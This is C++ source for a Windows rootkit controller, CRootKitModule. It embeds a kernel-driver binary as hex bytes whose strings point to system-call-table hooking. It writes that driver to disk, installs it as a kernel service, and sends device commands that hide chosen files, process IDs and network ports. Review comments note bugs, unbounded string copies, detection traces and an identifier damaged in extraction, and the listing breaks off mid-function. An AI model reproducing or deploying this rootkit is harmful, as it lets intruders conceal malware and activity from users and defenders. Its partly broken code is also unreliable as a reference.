"/x65/x74/x5f/x78/x38/x36/x5c/x69/x33/x38/x36/x5c/x48/x65/x6c/x6c"
"/x6f/x57/x6f/x72/x6c/x64/x2e/x70/x64/x62/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x4e/xe6/x40/xbb/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/xa1/x00/x30/x01/x00/x85/xc0/xb9/x4e/xe6/x40/xbb/x74/x04/x3b/xc1"
"/x75/x19/xa1/x3c/x20/x01/x00/x8b/x00/x35/x00/x30/x01/x00/xa3/x00"
"/x30/x01/x00/x75/x06/x89/x0d/x00/x30/x01/x00/xe9/x82/xd1/xff/xff"
"/x58/x40/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x02/x42/x00/x00"
"/x00/x20/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x9c/x40/x00/x00/xb2/x40/x00/x00"
"/xc4/x40/x00/x00/xdc/x40/x00/x00/xf4/x40/x00/x00/x0c/x41/x00/x00"
"/x1e/x41/x00/x00/x32/x41/x00/x00/x46/x41/x00/x00/x58/x41/x00/x00"
"/x78/x41/x00/x00/x8c/x41/x00/x00/xa8/x41/x00/x00/xc0/x41/x00/x00"
"/xdc/x41/x00/x00/xf4/x41/x00/x00/x00/x00/x00/x00/xf1/x01/x49/x6f"
"/x66/x43/x6f/x6d/x70/x6c/x65/x74/x65/x52/x65/x71/x75/x65/x73/x74"
"/x00/x00/x5e/x01/x49/x6f/x44/x65/x6c/x65/x74/x65/x44/x65/x76/x69"
"/x63/x65/x00/x00/x60/x01/x49/x6f/x44/x65/x6c/x65/x74/x65/x53/x79"
"/x6d/x62/x6f/x6c/x69/x63/x4c/x69/x6e/x6b/x00/x00/x3b/x04/x52/x74"
"/x6c/x49/x6e/x69/x74/x55/x6e/x69/x63/x6f/x64/x65/x53/x74/x72/x69"
"/x6e/x67/x00/x00/x54/x01/x49/x6f/x43/x72/x65/x61/x74/x65/x53/x79"
"/x6d/x62/x6f/x6c/x69/x63/x4c/x69/x6e/x6b/x00/x00/x4b/x01/x49/x6f"
"/x43/x72/x65/x61/x74/x65/x44/x65/x76/x69/x63/x65/x00/x00/x1e/x04"
"/x52/x74/x6c/x46/x72/x65/x65/x41/x6e/x73/x69/x53/x74/x72/x69/x6e"
"/x67/x00/xd7/x03/x52/x74/x6c/x43/x6f/x6d/x70/x61/x72/x65/x4d/x65"
"/x6d/x6f/x72/x79/x00/x00/xc9/x04/x52/x74/x6c/x55/x70/x70/x65/x72"
"/x53/x74/x72/x69/x6e/x67/x00/x00/xb5/x04/x52/x74/x6c/x55/x6e/x69"
"/x63/x6f/x64/x65/x53/x74/x72/x69/x6e/x67/x54/x6f/x41/x6e/x73/x69"
"/x53/x74/x72/x69/x6e/x67/x00/x00/x37/x04/x52/x74/x6c/x49/x6e/x69"
"/x74/x41/x6e/x73/x69/x53/x74/x72/x69/x6e/x67/x00/x69/x02/x4b/x65"
"/x53/x65/x72/x76/x69/x63/x65/x44/x65/x73/x63/x72/x69/x70/x74/x6f"
"/x72/x54/x61/x62/x6c/x65/x00/x00/x65/x05/x5a/x77/x51/x75/x65/x72"
"/x79/x44/x69/x72/x65/x63/x74/x6f/x72/x79/x46/x69/x6c/x65/x00/x00"
"/x75/x05/x5a/x77/x51/x75/x65/x72/x79/x53/x79/x73/x74/x65/x6d/x49"
"/x6e/x66/x6f/x72/x6d/x61/x74/x69/x6f/x6e/x00/x00/x3b/x05/x5a/x77"
"/x44/x65/x76/x69/x63/x65/x49/x6f/x43/x6f/x6e/x74/x72/x6f/x6c/x46"
"/x69/x6c/x65/x00/x7f/x02/x4b/x65/x54/x69/x63/x6b/x43/x6f/x75/x6e"
"/x74/x00/x6e/x74/x6f/x73/x6b/x72/x6e/x6c/x2e/x65/x78/x65/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x10/x00/x00/xb0/x00/x00/x00/xa4/x30/xbc/x30/x19/x31/x23/x31"
"/x34/x31/x4d/x31/xd7/x31/xdc/x31/xfc/x31/x14/x32/x28/x32/x3c/x32"
"/x43/x32/x56/x32/x5d/x32/x98/x32/xa0/x32/xaa/x32/xef/x32/xf5/x32"
"/x1b/x33/x2c/x33/x4f/x33/x64/x33/xb4/x33/xd0/x33/xdc/x33/xe2/x33"
"/xef/x33/x04/x34/x0d/x34/x24/x34/x3c/x34/x41/x34/x4c/x34/x61/x34"
"/x73/x34/x84/x34/xc2/x34/xd1/x34/xda/x34/xed/x34/x0d/x35/x23/x35"
"/x4b/x35/x6a/x35/x97/x35/xc0/x35/xcc/x35/xd2/x35/xdf/x35/xf4/x35"
"/xfd/x35/x14/x36/x2c/x36/x31/x36/x3c/x36/x51/x36/x61/x36/x6f/x36"
"/x87/x36/x97/x36/xb0/x36/xe4/x36/x51/x37/x6c/x37/x03/x38/x1e/x38"
"/x8d/x38/x9b/x38/xb3/x38/xc3/x38/xdc/x38/xe8/x38/xf4/x38/xfa/x38"
"/x07/x39/x1c/x39/x25/x39/x3c/x39/x54/x39/x59/x39/x64/x39/x79/x39"
"/x00/x40/x00/x00/x14/x00/x00/x00/x01/x30/x13/x30/x1a/x30/x1f/x30"
"/x27/x30/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";


// Destructor: closes the Service Control Manager handle held in m_hSCManager.
// The handle is closed unconditionally; nothing here checks that InitInstance()
// ever obtained a valid one.
CRootKitModule::~CRootKitModule(void)
{
   CloseServiceHandle(m_hSCManager);
}


// Opens the local Service Control Manager and clears the remembered driver name.
// Returns false when the SCM cannot be opened, true otherwise.
// SC_MANAGER_ALL_ACCESS is normally granted only to administrators, so this
// call is expected to fail for a standard user.
bool CRootKitModule::InitInstance()
{
   // NULL machine name and NULL database name select the local machine's active database.
   m_hSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
   if(m_hSCManager == NULL)
       return false;
   m_strDriverName = L"";
   return true;
}

// Empty placeholder; performs no work.
void CRootKitModule::Test()
{
   //..
}
// Registers a demand-start kernel-driver service with the SCM.
//   hSCManager  - open SCM handle.
//   ServiceName - used as both the service name and the display name.
//   ServiceExe  - path of the driver image the service points at.
// Returns TRUE when CreateService succeeds, FALSE otherwise. The service is
// only registered here, not started.
// Detection note: service creation leaves a key under
// HKLM\SYSTEM\CurrentControlSet\Services\<ServiceName> and, on systems that log
// it, a service-installation event in the System log.
BOOL CRootKitModule::InstallService(SC_HANDLE hSCManager, LPCTSTR ServiceName, LPCTSTR ServiceExe)
{
  SC_HANDLE schService;

  schService = CreateService( hSCManager,                 // SCManager database
                    ServiceName,         // name of service
                    ServiceName,         // name to display
                    SERVICE_ALL_ACCESS,     // desired access
                    SERVICE_KERNEL_DRIVER,   // service type
                    SERVICE_DEMAND_START,   // start type
                    SERVICE_ERROR_NORMAL,   // error control type
                    ServiceExe,         // service's binary
                    NULL,             // no load ordering group
                    NULL,             // no tag identifier
                    NULL,             // no dependencies
                    NULL,             // LocalSystem account
                    NULL               // no password
                    );
  if (schService == NULL)
   {
    return FALSE;
   }

  // Only the registration matters here; the service handle is not kept.
  CloseServiceHandle(schService);
  return TRUE;
}


// Opens the named service and asks the SCM to start it. For a service of type
// SERVICE_KERNEL_DRIVER, starting it loads the driver image into the kernel.
// Returns FALSE if the service cannot be opened; otherwise returns the result of
// ::StartService (zero on failure).
BOOL CRootKitModule::StartService(SC_HANDLE hSCManager, LPCTSTR ServiceName)
{
  SC_HANDLE schService = NULL;
  int     nRet = 0;
  
  schService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
  if(schService == NULL)
   {
       // Both paths return FALSE; the "does not exist" case is not treated differently.
       if(GetLastError() == ERROR_SERVICE_DOES_NOT_EXIST)
       {
           return FALSE;
       }
    return FALSE;
   }

   // Global-scope call: the Win32 API, not this member function of the same name.
   nRet = ::StartService(schService, 0, NULL);
   if(!nRet)
   {
       if(GetLastError() == ERROR_SERVICE_ALREADY_RUNNING)
       {
           // Returns the failure value; schService is not closed on this path.
           return nRet;
       }
   }

  CloseServiceHandle(schService);
  return nRet;
}

// Opens the named service and sends it SERVICE_CONTROL_STOP.
// Returns FALSE if the service cannot be opened; otherwise returns the result of
// ControlService (zero on failure).
BOOL CRootKitModule::StopService(SC_HANDLE hSCManager, LPCTSTR ServiceName)
{
  SC_HANDLE     schService = NULL;
  SERVICE_STATUS ServiceStatus;   // filled by ControlService; not read afterwards
   int         nRet = 0;

  schService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
  if(schService == NULL)
    return FALSE;

  nRet = ControlService(schService, SERVICE_CONTROL_STOP, &ServiceStatus);
   if(!nRet)
   {
       // Both listed errors return the failure value at once; schService is not
       // closed on these two paths. Any other error falls through to the close below.
       switch(GetLastError())
       {
       case ERROR_SERVICE_NOT_ACTIVE:
           return nRet;

       case ERROR_INVALID_SERVICE_CONTROL:
           return nRet;
       }
   }

  CloseServiceHandle(schService);
  return nRet;
}
// Opens the named service and marks it for deletion from the SCM database.
// Returns FALSE if the service cannot be opened; otherwise returns the result of
// DeleteService. The driver image file on disk is not touched by this function.
BOOL CRootKitModule::RemoveService(SC_HANDLE hSCManager, LPCTSTR ServiceName)
{
  SC_HANDLE schService;
  int         nRet = 0;

  schService = OpenService(hSCManager, ServiceName, SERVICE_ALL_ACCESS);
  if(schService == NULL)
       return FALSE;

  nRet = DeleteService(schService);

  CloseServiceHandle(schService);

  return nRet;
}

// Opens the driver's control device (MY_DEVICE_NAME) for read/write with no
// sharing, and only if it already exists (OPEN_EXISTING).
// Returns the CreateFile result unchanged; callers compare it with
// INVALID_HANDLE_VALUE and are responsible for closing it.
HANDLE CRootKitModule::_CreateFile()
{
   return CreateFile(MY_DEVICE_NAME,GENERIC_READ | GENERIC_WRITE,0,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
}

// Stops the driver service and removes its SCM registration.
// Returns whether RemoveService succeeded; the StopService result is ignored.
// As written, the szDriver argument is passed on only when it is NULL. A
// non-NULL szDriver is ignored and the name stored in m_strDriverName (set by
// CreateDriver) is used instead.
bool CRootKitModule::DeleteDriver(LPCTSTR szDriver )
{
   if( !szDriver)
   {
       // szDriver is NULL on this path, so NULL is the service name handed to both calls.
       StopService(m_hSCManager, szDriver);
       return !!RemoveService(m_hSCManager, szDriver);
   }
   StopService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
   return !!RemoveService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
  
  
}
// Writes the embedded driver image to szFileName and registers it as a
// kernel-driver service named szDriver, replacing any earlier registration of
// that name. The service is registered here but not started.
// Returns true when InstallService succeeds, false otherwise.
// Detection note: the observable sequence is a user-mode process creating a
// file, then a kernel-driver service being created that points at the same file.
bool CRootKitModule::CreateDriver(LPCSTR szFileName, LPCSTR szDriver)
{

   // NOTE(review): `Create_ALWAYS` is not a Windows SDK identifier as spelled;
   // this looks like page-extraction damage. hFile is not checked before use.
   HANDLE hFile=CreateFile(szFileName,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,Create_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
  DWORD dwBytes;
  // sizeof - 1 leaves out the string literal's terminating NUL; the WriteFile
  // result and dwBytes are not checked.
  WriteFile(hFile,g_szRootKitModule,sizeof(g_szRootKitModule) - 1,&dwBytes,NULL);
  CloseHandle(hFile);

   // Remember the name so StartDriver/StopDriver/DeleteDriver can find the service.
   m_strDriverName = ATL::CT2W(szDriver);
   // Clear out any previous instance; the results of both calls are ignored.
   StopDriver();
   RemoveService(m_hSCManager, szDriver);
   if ( !InstallService(m_hSCManager, szDriver, szFileName) )
       return false;
   return true;
}

// Starts the service whose name was recorded by CreateDriver().
// Returns the StartService result converted to bool.
bool CRootKitModule::StartDriver()
{
   return !!StartService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
}
// Stops the service whose name was recorded by CreateDriver().
// Returns the StopService result converted to bool.
bool CRootKitModule::StopDriver()
{
   return !!StopService(m_hSCManager, ATL::CW2T(m_strDriverName.c_str()));
}
// Sends ZFJ_ROOTKIT_ADDHIDEFILE to the control device with an upper-cased ANSI
// copy of szFile as input.
// Returns false if the device cannot be opened or the request fails, true otherwise.
bool CRootKitModule::AddHideFile(LPCTSTR szFile)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256];
   // Unbounded copy into a 256-byte stack buffer; the length of szFile is not
   // checked anywhere in this function.
   strcpy(szInBuff, ATL::CT2A(szFile));
   _strupr(szInBuff);
   DWORD dwBytesReturned;
   // The input length is taken from the original szFile, not from szInBuff. The
   // same buffer also serves as the 256-byte output buffer.
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEFILE,szInBuff,(DWORD)strlen(szFile), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
// Sends ZFJ_ROOTKIT_DELHIDEFILE to the control device with an upper-cased ANSI
// copy of szFile as input.
// Returns false if the device cannot be opened or the request fails, true otherwise.
bool CRootKitModule::DelHideFile(LPCTSTR szFile)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256];
   // Unbounded copy into a 256-byte stack buffer; the length of szFile is not
   // checked anywhere in this function.
   strcpy(szInBuff, ATL::CT2A(szFile));
   _strupr(szInBuff);
   DWORD dwBytesReturned;
   // The input length is the converted string's length without the terminator.
   // The same buffer also serves as the 256-byte output buffer.
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEFILE,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
// Sends ZFJ_ROOTKIT_STARTHIDEFILE to the control device with no payload.
// Returns false if the device cannot be opened or the request fails, true otherwise.
bool CRootKitModule::StartHideFile()
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   DWORD dwBytesReturned;
   // szInBuff is all zeros, so strlen() gives an input length of 0.
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEFILE,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}

// Sends ZFJ_ROOTKIT_ADDHIDEPROCESS to the control device with dwId copied into
// the start of a zeroed 256-byte buffer.
// Returns false if the device cannot be opened or the request fails, true otherwise.
bool CRootKitModule::AddHideProcessId(DWORD dwId)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   memcpy(szInBuff, &dwId, sizeof(DWORD));
   DWORD dwBytesReturned;
   // The declared input length is strlen(szInBuff): the number of bytes before
   // the first zero byte of the copied DWORD, which is not always sizeof(DWORD).
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
// Sends ZFJ_ROOTKIT_DELHIDEPROCESS to the control device with dwId copied into
// the start of a zeroed 256-byte buffer.
// Returns false if the device cannot be opened or the request fails, true otherwise.
bool CRootKitModule::DelHideProcessId(DWORD dwId)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   memcpy(szInBuff, &dwId, sizeof(DWORD));
   DWORD dwBytesReturned;
   // The declared input length is strlen(szInBuff): the number of bytes before
   // the first zero byte of the copied DWORD, which is not always sizeof(DWORD).
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
// Sends ZFJ_ROOTKIT_STARTHIDEPROCESS to the control device with no payload.
// Returns false if the device cannot be opened or the request fails, true otherwise.
bool CRootKitModule::StartHideProcess()
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   DWORD dwBytesReturned;
   // szInBuff is all zeros, so strlen() gives an input length of 0.
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEPROCESS,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}


// Sends ZFJ_ROOTKIT_ADDHIDEPORT to the control device with dwPort copied into
// the start of a zeroed 256-byte buffer.
// Returns false if the device cannot be opened or the request fails, true otherwise.
bool CRootKitModule::AddHidePort(DWORD dwPort)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   memcpy(szInBuff, &dwPort, sizeof(DWORD));
   DWORD dwBytesReturned;
   // The declared input length is strlen(szInBuff): the number of bytes before
   // the first zero byte of the copied DWORD, which is not always sizeof(DWORD).
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_ADDHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
// Sends ZFJ_ROOTKIT_DELHIDEPORT to the control device with dwPort copied into
// the start of a zeroed 256-byte buffer.
// Returns false if the device cannot be opened or the request fails, true otherwise.
bool CRootKitModule::DelHidePort(DWORD dwPort)
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   memcpy(szInBuff, &dwPort, sizeof(DWORD));
   DWORD dwBytesReturned;
   // The declared input length is strlen(szInBuff): the number of bytes before
   // the first zero byte of the copied DWORD, which is not always sizeof(DWORD).
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_DELHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
}
// Sends ZFJ_ROOTKIT_STARTHIDEPORT to the control device with no payload.
// Returns false if the device cannot be opened or the request fails, true otherwise.
bool CRootKitModule::StartHidePort()
{
   HANDLE hDevice = _CreateFile();
   if (hDevice==INVALID_HANDLE_VALUE)
       return false;
   char szInBuff[256] = "";
   DWORD dwBytesReturned;
   // szInBuff is all zeros, so strlen() gives an input length of 0.
   if (!(DeviceIoControl(hDevice,ZFJ_ROOTKIT_STARTHIDEPORT,szInBuff,(DWORD)strlen(szInBuff), szInBuff, 256, &dwBytesReturned,NULL)))
   {
   CloseHandle(hDevice);
   return FALSE;
   }
   CloseHandle(hDevice);
   return true;
   // NOTE(review): the function's closing brace is missing from the published listing.